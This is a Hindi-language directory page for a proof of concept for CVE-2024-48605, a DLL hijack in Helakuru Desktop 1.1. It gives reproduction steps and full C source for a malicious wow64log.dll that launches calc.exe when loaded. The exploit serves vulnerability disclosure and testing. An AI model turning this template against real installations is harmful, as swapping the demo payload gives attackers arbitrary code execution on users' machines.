Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HelakuruV.1.1-DLLHijack — Helakuru संस्करण 1.1 DLL हाईजैक - CVE-2024-48605 | Kitploit
उपकरण/GitHubGitHub/surajhacx/helakuruv.1.1-dllhijack
भेद्यता विश्लेषणकोड विश्लेषणशोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubsurajhacx/helakuruv.1.1-dllhijack

HelakuruV.1.1-DLLHijack

Helakuru संस्करण 1.1 DLL हाईजैक - CVE-2024-48605

रिपॉजिटरी देखें
5351 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Helakuru में DLL हाईजैकिंग भेद्यता

सारांश

Helakuru डेस्कटॉप संस्करण 1.1v 64-बिट और 32-बिट दोनों आर्किटेक्चर पर काम करता है। परीक्षण के दौरान, यह पाया गया कि प्रोग्राम wow64log.dll को लोड करने का प्रयास करता है, जो आधुनिक विंडोज ऑपरेटिंग सिस्टम में डिफ़ॉल्ट रूप से शामिल नहीं है। इसके परिणामस्वरूप 'Name not found' त्रुटि उत्पन्न होती है, जो प्रोग्राम को DLL हाईजैकिंग भेद्यता के लिए उजागर करती है। एक दुर्भावनापूर्ण wow64log.dll बनाकर, मनमाना कोड निष्पादन प्राप्त किया जा सकता है।

प्रभावित संस्करण

Helakuru Desktop 1.1v

पुनरुत्पादन के चरण

  1. ProcMon के साथ DLL लोडिंग की निगरानी करें
  • ProcMon wow64log.dll के लिए 'Name not found' के साथ CreateFile ऑपरेशन दिखा रहा है Pasted image 20240925232040
  1. एक दुर्भावनापूर्ण wow64log.dll बनाएं
root@kitploit:~
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. Helakuru डेस्कटॉप चलाएं
  • Helakuru डेस्कटॉप को पुनः लॉन्च करें। अब दुर्भावनापूर्ण wow64log.dll प्रोग्राम में लोड हो जाएगा, जो सफल DLL इंजेक्शन के प्रदर्शन के रूप में कैलकुलेटर को ट्रिगर करेगा। Pasted image 20240925233737
  1. ProcMon का उपयोग करके DLL लोड सत्यापित करें
  • ProcMon को पुनः खोलें और देखें कि इस बार wow64log.dll सफलतापूर्वक लोड हो गया है, यह पुष्टि करते हुए कि कस्टम DLL को प्रोग्राम द्वारा निष्पादित किया गया है। Pasted image 20240925232728

प्रभाव: यह भेद्यता मनमाना कोड निष्पादन की अनुमति देती है।

टूल डाउनलोड करें